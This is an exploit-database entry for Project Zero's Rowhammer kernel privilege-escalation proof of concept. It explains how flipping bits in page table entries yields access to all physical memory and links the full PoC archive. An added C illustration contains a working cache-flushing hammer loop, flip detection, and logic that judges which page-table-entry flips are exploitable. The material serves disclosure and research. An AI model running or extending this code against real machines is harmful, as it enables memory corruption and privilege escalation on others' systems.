Linux Kernel (x86-64) – Rowhammer Privilege Escalation

  • Author: Google Security Research
    Date: 2015-03-09
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/36310/
  • Sources:
    http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
    https://code.google.com/p/google-security-research/issues/detail?id=283
    
    Full PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36310.tar.gz
    
    This is a proof-of-concept exploit that is able to gain kernel
    privileges on machines that are susceptible to the DRAM "rowhammer"
    problem. It runs as an unprivileged userland process on x86-64 Linux.
    It works by inducing bit flips in page table entries (PTEs): a flipped
    PTE that still maps a present, user-writable page but now points at one
    of the process's own page tables lets the process rewrite that page
    table, and with it gain read/write access to all of physical memory.
    
    For development purposes, the exploit program has a test mode in which
    it induces a bit flip by writing to /dev/mem. qemu_runner.py will run
    the exploit program in test mode in a QEMU VM. It assumes that
    "bzImage" (in the current directory) is a Linux kernel image that was
    built with /dev/mem enabled (specifically, with the
    CONFIG_STRICT_DEVMEM option disabled; distribution kernels enable it by
    default precisely to stop userland from reaching RAM through /dev/mem,
    so a stock kernel will not work for test mode).
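
    The three mechanisms described above (the cache-flushing hammer loop,
    detection of flipped bits in a pattern-filled buffer, and deciding
    whether a given flip in a PTE is exploitable) are illustrated by the
    following added example. This is not the Project Zero PoC and not its
    code; the PTE bit positions are the architectural x86-64 4 KiB-page
    layout, while all function names, the 64 MiB buffer, the iteration
    count and the random pair selection are assumptions chosen for the
    illustration.

```c
/* rowhammer_demo.c: added illustration, not the Project Zero exploit.
 * PTE bit layout is architectural; everything else is a local choice. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

#define PAGE_SHIFT   12
#define PTE_PRESENT  (1ULL << 0)
#define PTE_WRITE    (1ULL << 1)
#define PTE_USER     (1ULL << 2)
#define PTE_NX       (1ULL << 63)
#define PTE_PFN_MASK 0x000FFFFFFFFFF000ULL  /* bits 12..51 of a 4 KiB PTE */

/* 1. Hammer loop: read two addresses in different rows of the same DRAM bank,
 *    flushing them from cache so each read really goes to DRAM.  On
 *    susceptible DIMMs this disturbs neighbouring ("victim") rows.  clflush
 *    is x86-64 only; elsewhere this is a plain loop that flips nothing. */
static void hammer(volatile uint64_t *a, volatile uint64_t *b, unsigned iterations)
{
    for (unsigned i = 0; i < iterations; i++) {
        (void)*a;
        (void)*b;
#if defined(__x86_64__)
        __asm__ volatile("clflush (%0)" : : "r"(a) : "memory");
        __asm__ volatile("clflush (%0)" : : "r"(b) : "memory");
#endif
    }
}

/* 2. Flip detection: compare a buffer that was filled with a known pattern
 *    against its current contents; return the number of flipped bits and
 *    record up to max_out of their positions. */
struct flip { size_t offset; int bit; };

static size_t find_flips(const uint8_t *buf, size_t len, uint8_t pattern,
                         struct flip *out, size_t max_out)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t diff = buf[i] ^ pattern;
        for (int b = 0; b < 8; b++) {
            if (diff & (1u << b)) {
                if (n < max_out) { out[n].offset = i; out[n].bit = b; }
                n++;
            }
        }
    }
    return n;
}

/* 3. Effect of one flip on a PTE.  A flip is useful when the corrupted PTE
 *    is still present, user and writable but its frame number changed: with
 *    page tables sprayed across RAM that frame is probably one of the
 *    process's own page tables.  (Bits above MAXPHYADDR are also reserved on
 *    real hardware; that is not modelled here.) */
enum flip_outcome { FLIP_USELESS, FLIP_FLAG_ONLY, FLIP_PFN_CHANGED };

static uint64_t make_user_rw_pte(uint64_t pfn)
{
    return ((pfn << PAGE_SHIFT) & PTE_PFN_MASK) | PTE_PRESENT | PTE_WRITE | PTE_USER;
}

static uint64_t pfn_of(uint64_t pte) { return (pte & PTE_PFN_MASK) >> PAGE_SHIFT; }

static enum flip_outcome classify_pte_flip(uint64_t pte, int bit)
{
    uint64_t new_pte = pte ^ (1ULL << bit);
    if (bit >= 52 && bit <= 62)          /* reserved bits: a 0->1 flip faults */
        return FLIP_USELESS;
    if (!(new_pte & PTE_PRESENT) || !(new_pte & PTE_USER) || !(new_pte & PTE_WRITE))
        return FLIP_USELESS;             /* no longer a user-writable mapping */
    if (pfn_of(new_pte) != pfn_of(pte))
        return FLIP_PFN_CHANGED;
    return FLIP_FLAG_ONLY;               /* e.g. NX toggled on a data page */
}

/* Stand-alone run: hammer random page pairs in a 64 MiB buffer and report any
 * flips.  A healthy machine reports none. */
int main(void)
{
    const size_t len = 64u << 20;
    uint8_t *buf = malloc(len);
    if (!buf) return 1;
    for (size_t i = 0; i < len; i++) buf[i] = 0xFF;
    for (int round = 0; round < 100; round++) {
        size_t pa = ((size_t)rand() % (len >> PAGE_SHIFT)) << PAGE_SHIFT;
        size_t pb = ((size_t)rand() % (len >> PAGE_SHIFT)) << PAGE_SHIFT;
        if (pa == pb) continue;
        hammer((volatile uint64_t *)(buf + pa), (volatile uint64_t *)(buf + pb), 500000);
        struct flip f[8];
        size_t n = find_flips(buf, len, 0xFF, f, 8);
        for (size_t i = 0; i < n && i < 8; i++) {
            printf("flip at offset 0x%zx bit %d (pair 0x%zx/0x%zx)\n", f[i].offset, f[i].bit, pa, pb);
            buf[f[i].offset] = 0xFF;     /* re-arm the pattern for the next round */
        }
    }
    free(buf);
    return 0;
}
```

    Picking pairs at random is the simplest way to land two addresses in the
    same bank without knowing the DRAM address mapping; the PoC's test mode
    sidesteps the whole hammering step by writing the flip into a page-table
    page through /dev/mem, which is why it needs CONFIG_STRICT_DEVMEM off.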
    
    Mark Seaborn
    mseaborn@chromium.org
    March 2015